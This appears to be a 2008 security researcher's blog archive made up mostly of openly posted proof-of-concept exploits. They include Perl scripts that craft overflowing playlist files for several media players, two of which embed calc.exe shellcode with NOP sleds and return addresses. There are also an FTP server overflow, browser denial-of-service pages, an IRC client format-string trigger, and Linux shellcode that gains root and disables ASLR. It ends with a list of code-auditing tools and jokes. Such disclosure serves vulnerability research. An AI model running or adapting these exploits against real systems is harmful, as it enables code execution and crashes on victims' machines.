23 November, 2008

Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC



#!/usr/bin/perl -w
#
# Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
#
# Summary: Nero ShowTime provides you with a high-performance software DVD player
# that takes you to a new dimension in DVD's. Its cinema-like sound and excellent image
# quality for all digital pictures make an adventure of every film! What is more, Nero ShowTime
# supports all DVD-Video formats and can play them from a disc and from the hard drive.
#
# Product web page: http://www.nero.com
#
# Description: Nero ShowTime is prone to a buffer-overflow vulnerability because it fails
# to perform adequate boundary checks on user-supplied input. Successfully exploiting
# these issues may allow remote attackers to execute arbitrary code in the context of the
# application. Failed exploit attempts will cause denial-of-service conditions. Nero ShowTime
# 5.0.15.0 is vulnerable, prior versions may also be affected.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [ t00t ] gmail [ d0t ] com
#
# 24.11.2008
#

$filename = "Jackie_Chan.m3u";

$mana = "A" x 432809;

print "\n\n[*] Creating evul playlist: $filename ...\r\n";
sleep(3);

open(m3u, ">./$filename") || die "\n\aCannot open $filename: $!";

print m3u "$mana";

close (m3u);

print "\n[*] Playlist file successfully created!\r\n";

24 October, 2008

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

-------------------------------------------
<!--

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC addicted developers around the world.

Product web page: http://www.kvirc.net/

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

24.10.2008

-->


<html>

<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>

<head>

<body>

<center> <br /> <br /> <strong>Warning ! :)</strong> </center>

<body bgcolor="#FFFF00">

<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
{
window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true)
{
poc();
}

else
{
window.location.href = "http://www.kvirc.net";
}

</script> </body> </head> </html>

-------------------------------------------



PoC: http://zeroscience.org/codes/kvirc_fs.html

14 October, 2008

Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC

---------------------------------------------------

#!/usr/bin/perl
#
# Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC
#
# Summary: Eserv/3.x - Mail, News, Web and Proxy Servers - Mail
# Server (SMTP, IMAP4 and POP3) - News Server (NNTP) - Web Server
# (HTTP) - FTP Server - Proxy Servers (HTTP, FTP, Socks, etc) - Finger
# Server - Built-in scheduler and dialer.
#
# Product web page: http://www.eserv.ru/ | www.etype.net/eserv/
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 14.10.2008
#

use Net::FTP;

$ipaddr = "127.0.0.1";
$mana = "..?" x 13000;
$user = "admin";
$pass = "nimda";
$port = 21;

$ftp = Net::FTP->new("$ipaddr", Debug => 0) || die "Cannot connect to $ipaddr on port $port: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;

$ftp->abor($mana);

$ftp->quit;

print "\nDone!\n";

---------------------------------------------------

http://www.milw0rm.com/exploits/6752
http://www.packetstormsecurity.org/filedesc/eserv-overflow.txt.html
http://www.securityfocus.com/bid/31753/

03 October, 2008

VBA32 Personal Antivirus 3.12.8.x (malformed archive) Denial of Service PoC

Summary: Antivirus program for personal computers running Windows which is a reliable and, it is crucial, quick tool to detect and neutralize computer viruses, mail worms, trojan programs and other malware (backdoors, adware, spyware, etc) in real time and by request.

Desc: VBA32 (VirusBlokAda) Personal Version 3.12.8.x suffers from a denial of service vulnerability that causes memory corruption and causing the software to crash while scanning a malformed archive.

Product web page: http://www.anti-virus.by/en/personal.html

Tested on Microsoft Windows XP SP2 (English)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [m00t] com

http://www.zeroscience.org

03.10.2008

PoC: http://zeroscience.org/codes/vba32_poc.rar

http://www.milw0rm.com/exploits/6658
http://packetstormsecurity.org/filedesc/vba32-poc-tgz.html
http://www.sebug.net/exploit/4800/
http://www.securityfocus.com/bid/31560
http://heapoverflow.com/f0rums/public/9134-vba32-personal-antivirus-3-12-8-x-malformed-archive-dos-exploit.html

15 September, 2008

CoolCon v0.2 Released




Released my Cool Converter :P "CoolCon v0.2" written in C language, 862 lines of code with a nice interface and new features added.

Conversion from Text to: Binary, Decimal, Octal, Hexadecimal, ASCII, ROT13(vice versa)
Conversion from Decimal to: Binary, Octal, Hexadecimal
Conversion from Binary to: Decimal, Octal, Hexadecimal
Conversion from Text to URL Unicode UTF-8 (new).

Included: ASCII table and Base64 table output

I know i said that the new version will have base64 conversion and vigenere cipher but..no time so enjoy and till next release ;)

CoolCon v0.2 Download link: http://www.packetstormsecurity.org/Win/CoolCon0.2.rar

t00t :D

09 September, 2008

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

<!--

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

Summary: Maxthon Browser is a powerful tabbed browser built for
all users. Besides basic browsing functionality, Maxthon Browser
provides a rich set of features to improve your surfing experience.

Product web page: http://www.maxthon.com

by Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

09.09.2008

-->


<html>

<title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</title>

<head>

<body>

<script type="text/javascript">

alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC\n\n\t\tby LiquidWorm");

function thricer()
{
title="Attack";

url="http://www.thrice.net/";

if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}

else if( window.external )
{
window.external.AddFavorite( url, title);
}

else if(window.opera && window.print)
{
return (true);
}
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true)
{
for (x=0; x<x+1; x++)

thricer();
}

else
{
alert("Allrighty Then!");

window.location.href = "http://www.disneyland.com";
}

</script>

</body>

</head>

</html>


http://www.packetstormsecurity.org/filedesc/maxthon-dos.txt.html
http://www.milw0rm.com/exploits/6434
http://www.securityfocus.com/bid/31098
http://www.zeroscience.org/codes/maxthon_dos.txt

Test: CLICK (warned)

07 September, 2008

SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

<!--

Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.

Product web page: http://www.seamonkey-project.org/

Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.

Tested on Microsoft Windows XP SP2 (English)

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

08.09.2008

-->

<html>

<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>

<head>

<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />

<center>

<script type="text/javascript">

document.write("<kbd>Wooow Camel..!! WOW!</kbd>");

function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}

alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");

var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (b0x == true)
{
t00t();
}

else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}

</script> </center> </body> </head> </html>

http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070

Test: http://www.zeroscience.org/codes/seamonkey_dos.html

Photoshop Session No.5

06 September, 2008

Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit



http://www.milw0rm.com/exploits/6391

http://www.packetstormsecurity.org/filedesc/flockweb-dos.txt.html

http://www.securityfocus.com/bid/31044/

Test: http://www.zeroscience.org/codes/flock_dos.html

PoC follows:
-------------------------------------------------

<!----------------------------------------------0
||
| Flock Web Browser 1.2.5 Remote DoS Exploit|
| |
| by Gjoko 'LiquidWorm' Krstic|
| |
| http://www.zeroscience.org|
| |
| liquidworm [t00t] gmail.com|
| |
| 06.09.2008|
| |
0----------------------------------------------->


<html>

<title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</Title>

<head>

<br /><br />

<center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1>

<br /><h2><kbd>Freezed/Locked - Not Responding...</kbd><h2></center>

<body>

<script type="text/javaScript">


function Xploit()
{
title="DoS";
url="http://www.destr0y.net";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}

else if( window.external )
{
window.external.AddFavorite( url, title);
}

else if(window.opera && window.print)
{
return (true);
}
}

for (n=0; n<n+1; n++)

Xploit();


</script>

<center>
<a href="http://www.zeroscience.org/codes/flock_dos.html"><i>http://www.zeroscience.org/codes/flock_dos.html</i></a>
</center>

</body> </head> </html>

<!-- thanks to Gianni Amato -->

------------------------------------------

05 September, 2008

Google Chrome Browser 0.2.149.27 Denial of Service Exploit



Test: http://zeroscience.org/codes/goodos.html

http://packetstormsecurity.org/filedesc/google-chrome-dos2.txt.html

<!-----------------------------------------------
| |
| Vulnerability discovered by Rishi Narang |
| |
| Exploit by LiquidWorm, September 2008 |
| |
| http://www.zeroscience.org |
| |
| liquidworm [t00t] gmail.com |
| |
------------------------------------------------>

<html>

<title>Google Chrome DoS Exploit</title>

<head>

<br />
<br />

<script type="text/javascript">

alert("Google Chrome Browser 0.2.149.27 Denial of Service Exploit");

var box = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (box == true)
{
document.write("Just point to the hyperlink... <a href=\"jox:%\"><strong>HERE</strong></a>");
}

else { alert("Ok Dude!"); window.location.href = "http://www.zeroscience.org"; }

</script>

</head>

</html>

25 August, 2008

Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space") Shellcode

/*
* Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space")
*
* by LiquidWorm
*
* 2008 (c) www.zeroscience.org
*
* liquidworm [at] gmail.com
*
* 79 bytes.
*
*/


char sc[] =

"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x70\x61\x63\x65" // push $0x65636170
"\x76\x61\x5f\x73" // push $0x735f6176
"\x69\x7a\x65\x5f" // push $0x5f657a69
"\x6e\x64\x6f\x6d" // push $0x6d6f646e
"\x6c\x2f\x72\x61" // push $0x61722f6c
"\x65\x72\x6e\x65" // push $0x656e7265
"\x73\x2f\x2f\x6b" // push $0x6b2f2f73
"\x2f\x2f\x73\x79" // push $0x79732f2f
"\x70\x72\x6f\x63" // push $0x636f7270
"\x20\x3e\x20\x2f" // push $0x2f203e20
"\x68\x6f\x20\x30" // push $0x30206f68
"\x2f\x2f\x65\x63" // push $0x63652f2f
"\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80

int main()
{
int (*fp)() = (int(*)())sc;
printf("bytes: %u\n", strlen(sc));
fp();
}


http://www.sebug.net/exploit/4455/
http://pooh.gr.jp/item-5674.html
http://www.milw0rm.com/shellcode/6268
http://packetstormsecurity.org/filedesc/linux-set.txt.html

VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit

#!/usr/bin/perl
#
# Title: VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
#
# Summary: VUPlayer is a freeware multi-format audio player for Windows
#
# Product web page: http://www.vuplayer.com/vuplayer.php
#
# Desc: VUPlayer 2.49 suffers from buffer overflow vulnerability that can be
# exploited remotely using user intereaction or crafting. It fails to perform
# adequate boundry condition of the user input file (1016 bytes), allowing us
# to overwrite the EIP, ECX and EBP registers. Successful exploitation executes
# calc.exe, failed attempt resolve in DoS.
#
#
# ---------------------------------WinDbg-------------------------------------
#
# (e7c.c40): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000001 ecx=41414141 edx=00da5c98 esi=0050b460 edi=0012ee24
# eip=41414141 esp=0012eab8 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???
#
# ----------------------------------------------------------------------------
#
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Greg Linares & Expanders in version 2.44 (2006)
#
# Refs:
#
# - cVE: CVE-2006-6251
# - MILW0RM:2872
# - MILW0RM:2870
# - CERT-VN:VU#311192
# - BID:21363
# - FRSIRT:ADV-2006-4783
# - SECUNIA:23182
# - XF:vuplayer-plsm3u-bo(30629)
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 18.08.2008
#


print "\n\n";
print "=" x 80;
print "\n\n";
print "\tVUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit\n";
print "\t\t by LiquidWorm \n\n\n";
print "=" x 80;

# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com

$SHELLCODE = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff".
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56".
"\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30".
"\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43".
"\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32".
"\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42".
"\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42".
"\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x34".
"\x4e\x43\x4b\x58\x4e\x57\x45\x30\x4a\x57".
"\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31".
"\x4b\x58\x4f\x45\x42\x52\x41\x30\x4b\x4e".
"\x49\x54\x4b\x48\x46\x53\x4b\x38\x41\x30".
"\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a".
"\x46\x38\x42\x4c\x46\x37\x47\x50\x41\x4c".
"\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x50".
"\x45\x57\x45\x4e\x4b\x38\x4f\x55\x46\x52".
"\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30".
"\x4b\x54\x4b\x58\x4f\x55\x4e\x51\x41\x50".
"\x4b\x4e\x4b\x38\x4e\x51\x4b\x38\x41\x30".
"\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30".
"\x43\x4c\x41\x33\x42\x4c\x46\x36\x4b\x38".
"\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37".
"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x4a\x36".
"\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x38".
"\x42\x4b\x42\x50\x42\x50\x42\x30\x4b\x38".
"\x4a\x36\x4e\x53\x4f\x55\x41\x53\x48\x4f".
"\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38".
"\x42\x4c\x4b\x57\x42\x35\x4a\x36\x4f\x4e".
"\x50\x4c\x42\x4e\x42\x56\x4a\x56\x4a\x39".
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f".
"\x47\x4e\x43\x36\x41\x56\x4e\x36\x43\x36".
"\x50\x32\x45\x36\x4a\x57\x45\x46\x42\x50".
"\x5a";


$FILE = "TETOVIRANJE.m3u";

$GARBAGE = "\x4A" x 461;

$NOPSLED = "\x90" x 200;

$RET = "\xC0\xE6\x12\x00";

print "\n\n[-] Buffering malicious playlist file. Please wait...\r\n";

sleep (5);

open (BOF, ">./$FILE") || die "\nCan't open $FILE: $!";

print BOF "$NOPSLED" . "$SHELLCODE" . "$GARBAGE" . "$RET";

close (BOF);

print "\n\n[+] File $FILE successfully created!\n\n";

system (pause);

Stack:




EIP:





Shellcode:





http://www.packetstormsecurity.org/filedesc/vuplayer_bof.pl.txt.html
http://www.securityfocus.com/bid/21363

Zinf 2.2.1 PLF/M3U/GQMPEG Playlist File Remote Buffer Overflow Exploit

#!/usr/bin/perl
#
# Zinf 2.2.1 PLF/M3U/GQMPEG Playlist File Remote Buffer Overflow Exploit
#
# Summary: The Zinf audio player is a simple, but powerful audio player for Linux and
# Win32. It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast HTTP
# streaming, RTP streaming, a powerful music browser, theme support and a download manager.
#
# Product web page: http://www.zinf.org/
#
# Desc: Zinf is reported prone to a remote buffer overflow vulnerability when processing
# malformed playlist files. This issue exists due to insufficient boundary checks performed
# by the application and may allow an attacker to gain unauthorized access to a vulnerable
# computer. Reportedly, this issue affects Zinf version 2.2.1 for Windows. Zinf version 2.2.5
# for Linux is reportedly fixed, however, this is not confirmed at the moment.
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Refs:
#
# - http://www.securityfocus.com/bid/11248
# - http://www.milw0rm.com/exploits/559
#
# Vulnerability discovered by Luigi Auriemma (24.11.2004)
#
# Coded by Gjoko "LiquidWorm" Krstic
#
# liquidworm [At] gmail.com
#
# http://www.zeroscience.org
#
# 14.08.2008
#

$buffer = "A" x 1300;
$ret = "BBBB";


open(pls, ">./zinf_list.pls");

print pls $buffer.$ret;

print "\n--> PoC Playlist created...\n";

08 August, 2008

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)

-------------------------------------
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio(Dolby) quality, together with other
# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image
# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for.The DVD player software can be extensive
# compatible with hardware,which is operated stable,smoothly under Windows98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be
# exploited via crafted PLF playlist file localy and remotely. It fails to
# perform boundry checking of the user input file, allowing the EIP to be
# overwritten, thus, controling the next insctruction of the software. After
# succesfull exploitation, calc.exe will be executed. Failed attempts will
# result in Denial Of Service (DoS).
#
# WinDgb(output):
#
# - (4d8.f80): Access violation - code c0000005 (first chance)
# - First chance exceptions are reported before any exception handling.
# - This exception may be expected and handled.
# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc
# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# - 41414141 ?? ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
#

print "\n|==================================================================|\n";
print "| |\n";
print "| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\n";
print "| by LiquidWorm
|\n";
print "| |\n";
print "|==================================================================|\n\n";

$nop = "\x90" x 96;


# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com

$shellcode = "\x29\xc9\x83\xe9\xdd\xd9\xee".
"\xd9\x74\x24\xf4\x5b\x81\x73".
"\x13\x7d\xe6\xe7\x4e\x83\xeb".
"\xfc\xe2\xf4\x81\x0e\xa3\x4e".
"\x7d\xe6\x6c\x0b\x41\x6d\x9b".
"\x4b\x05\xe7\x08\xc5\x32\xfe".
"\x6c\x11\x5d\xe7\x0c\x07\xf6".
"\xd2\x6c\x4f\x93\xd7\x27\xd7".
"\xd1\x62\x27\x3a\x7a\x27\x2d".
"\x43\x7c\x24\x0c\xba\x46\xb2".
"\xc3\x4a\x08\x03\x6c\x11\x59".
"\xe7\x0c\x28\xf6\xea\xac\xc5".
"\x22\xfa\xe6\xa5\xf6\xfa\x6c".
"\x4f\x96\x6f\xbb\x6a\x79\x25".
"\xd6\x8e\x19\x6d\xa7\x7e\xf8".
"\x26\x9f\x42\xf6\xa6\xeb\xc5".
"\x0d\xfa\x4a\xc5\x15\xee\x0c".
"\x47\xf6\x66\x57\x4e\x7d\xe6".
"\x6c\x26\x41\xb9\xd6\xb8\x1d".
"\xb0\x6e\xb6\xfe\x26\x9c\x1e".
"\x15\x16\x6d\x4a\x22\x8e\x7f".
"\xb0\xf7\xe8\xb0\xb1\x9a\x85".
"\x86\x22\x1e\xc8\x82\x36\x18".
"\xe6\xe7\x4e";


$ret = "\x78\x53\xbe\x01";

$payload = $nop.$shellcode.$ret;

open(plf, ">./The_Dark_Knight.plf");

print plf "$payload";

print "\n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!\n\n";

print "\n...t00t w00t!\n\a\n";

# August, 2008
-------------------------------------






























http://www.milw0rm.com/exploits/6217
http://zeroscience.org/codes/blazedvd_bof.txt
http://www.securityfocus.com/bid/21337/exploit
http://www.xakep.ru/post/44818/BlazeDVD-Remote-Buffer-Overflow-Exploit.txt

CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit

Not being able to blog lately so I'll be brief..no time ..

PoC:

--------------------------

#!/usr/bin/perl
#
# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
# Coded by Gjoko "LiquidWorm" Krstic
# liquidworm [At] gmail.com
# http://www.zeroscience.org
#

$buffer = "J" x 520000; open(m3u, ">./evil_list.m3u"); # or .pls

print m3u "$buffer";

print "\n--> Evil Playlist created... Have fun!\n";



# July, 2008
--------------------------



-------------------------------------------------------------------------------------------
(ea0.d4c): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00003e84 ebx=02890048 ecx=00032310 edx=02890049 esi=0007ef41 edi=0012cb2c
eip=0043fb37 esp=0012c308 ebp=0012cf4c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
image00400000+0x3fb37:
0043fb37 8501 test dword ptr [ecx],eax ds:0023:00032310=00000000

-------------------------------------------------------------------------------------------

http://zeroscience.org/codes/powerdvd_bof.txt
http://www.securityfocus.com/bid/30341/
http://www.packetstormsecurity.org/filedesc/powerdvd_bof.pl.txt.html
http://www.juniper.net/security/auto/vulnerabilities/vuln30341.html
http://www.venustech.com.cn/NewsInfo/124/1959.Html
http://www.maestro-sec.com/forum/viewtopic.php?t=588&f=19
http://www.hwupgrade.it/forum/showthread.php?p=23436246

24 June, 2008

List of Source Code Auditing tools

Name - [ language/s supported ] - web link:

.TEST
- [ C#, VB.NET, MC++ ] - http://www.parasoft.com/jsp/products.jsp

ASTRÉE - [ C ] - http://www.astree.ens.fr

Bandera - [ Java ] - http://bandera.projects.cis.ksu.edu/

BLAST - [ C ] - http://mtc.epfl.ch/software-tools/blast/

BOON - [ C ] - http://www.cs.berkeley.edu/~daw/boon/

C Code Analyzer (CCA) - [ C ] - http://www.drugphish.ch/~jonny/cca.html

C++test - [ C++ ] - http://www.parasoft.com/jsp/products.jsp

CCMetrics - [ C#, VB.NET ] - http://www.serviceframework.com/jwss/utility,ccmetrics,utility.aspx

Checkstyle - [ Java ] - http://checkstyle.sourceforge.net/

CodeCenter - [ C ] - http://www.ics.com/products/centerline/codecenter/features.html

CodeScan - [ .ASP, PHP ] - http://www.codescan.com/

CodeSecure - [ PHP, Java ] - http://www.armorize.com/corpweb/en/products/codesecure

CodeSonar - [ C, C++ ] - http://www.grammatech.com/products/codesonar/overview.html

CQual - [ C ] - http://www.cs.umd.edu/~jfoster/cqual

Csur - [ C ] - http://www.lsv.ens-cachan.fr/csur/

Dehydra - [ C++ ] - http://wiki.mozilla.org/Dehydra_GCC

DevInspect - [ C#, Visual Basic, JavaScript, VB Script] - http://www.spidynamics.com/products/devinspect/

DevPartner SecurityChecker - [ C#, Visual Basic ] - http://www.compuware.com/products/devpartner/securitychecker.htm

DoubleCheck - [ C, C++ ] - http://www.ghs.com/products/doublecheck.html

FindBugs - [ Java ] - http://findbugs.sourceforge.net/

FlawFinder - [ C, C++ ] - http://www.dwheeler.com/flawfinder/

Fluid - [ Java ] - http://www.fluid.cs.cmu.edu/

Frama-C - [ C ] - http://frama-c.cea.fr/

ftnchek - [ FORTRAN ] - http://www.dsm.fordham.edu/~ftnchek/

FxCop - [ .NET ] - http://code.msdn.microsoft.com/codeanalysis

g95-xml - [ FORTRAN ] - http://g95-xml.sourceforge.net/

ITS4 - [ C, C++ ] - http://www.cigital.com/its4/

Jlint - [ Java ] - http://artho.com/jlint/

JsLint - [ JavaScript ] - http://www.jslint.com/

Jtest - [ Java ] - http://www.parasoft.com/jsp/products.jsp

KlocWork / K7 - [ C, C++, Java ] - http://www.klocwork.com/products/k7_security.asp

LAPSE - [ Java ] - http://www.owasp.org/index.php/Category:OWASP_LAPSE_Project

MOPS - [ C ] - http://www.cs.berkeley.edu/~daw/mops/

MSSCASI - [ ASP ] - http://www.microsoft.com/downloads/details.aspx?FamilyId=58A7C46E-A599-4FCB-9AB4-A4334146B6BA&displaylang=en

MZTools - [ VB6, VBA ] - http://www.mztools.com/index.aspx/

Oink - [ C++ ] - http://www.cubewano.org/oink

Ounce - [ C, C++, Java, JSP, ASP.NET, VB.NET, C# ] - http://www.ouncelabs.com/accurate-complete-results.html

Perl-Critic - [ Perl ] - http://search.cpan.org/dist/Perl-Critic/

PLSQLScanner 2008 - [ PLSQL ] - http://www.red-database-security.com/software/plsqlscanner.html

PHP-Sat - [ PHP ] - http://www.program-transformation.org/PHP/PhpSat

Pixy - [ PHP ] -
http://pixybox.seclab.tuwien.ac.at/pixy/index.php

PMD - [ Java ] - http://pmd.sourceforge.net/

PolySpace - [ Ada, C, C++ ] - http://www.polyspace.com/products.htm

PREfix & PREfast - [ C, C++ ] - http://support.microsoft.com/vst

Prevent - [ C, C++ ] - http://www.coverity.com/html/coverity-software-quality-products.html

PyChecker - [ Python ] - http://pychecker.sourceforge.net/

pylint - [ Python ] - http://www.logilab.org/project/pylint

QA-C, QA-C++, QA-J - [ C, C++, Java, FORTRAN ] - http://www.programmingresearch.com/PRODUCTS.html

QualityChecker - [ Visual Basic 6 ] - http://d.cr.free.fr/

RATS - [ C, C++, Perl, PHP, Python ] - http://www.fortify.com/security-resources/rats.jsp

RSM - [ C, C++, C#, Java ] - http://msquaredtechnologies.com/m2rsm/

Smatch - [ C ] - http://smatch.sourceforge.net/

SCA - [ ASP.NET, C, C++, C#, Java, JSP, PL/SQL, T-SQL, VB.NET, XML ] - http://www.fortifysoftware.com/products/sca/

Skavenger - [ PHP ] - http://code.google.com/p/skavenger/

smarty-lint - [ PHP ] - http://code.google.com/p/smarty-lint/

soot - [ Java ] - http://www.sable.mcgill.ca/soot/

Source Monitor - [ C#, VB.NET ] - http://www.campwoodsw.com/sm20.html

SPARK - [ Ada ] - http://www.praxis-his.com/sparkada/spark.asp

Spike PHP Security Audit Tool - [ PHP ] - http://developer.spikesource.com/projects/phpsecaudit/

Splint - [ C ] - http://www.splint.org/

SWAAT - [ PHP, ASP.NET, JSP, Java ] - http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project

UNO - [ C ] - http://spinroot.com/uno/">

vil - [ C#, VB.NET ] - http://www.1bot.com/

Viva64 - [ C++ ] - http://www.viva64.com/

xg++ - [ C ] - http://www.stanford.edu/~engler/mc-osdi.pdf

YTKScan Java - [ Java ] - http://www.cam.org/~droujav/y2k/Y2KScan.html


t00t w00t ;)

23 June, 2008

Risk assessment

Risk assessment is a common first step in a risk management process. Risk assessment is the determination of quantitative or qualitative value of risk related to a concrete situation and a recognized threat.

http://en.wikipedia.org/wiki/Risk_assessment

01 March, 2008

Linus Torvalds jokes

Linus Torvalds can run kill -9 and kill Chuck Norris.

Linus Torvalds doesn't die, he simply returns zero.

Linus Torvalds first written program had artificial intelligence.

Linus can divide by zero.

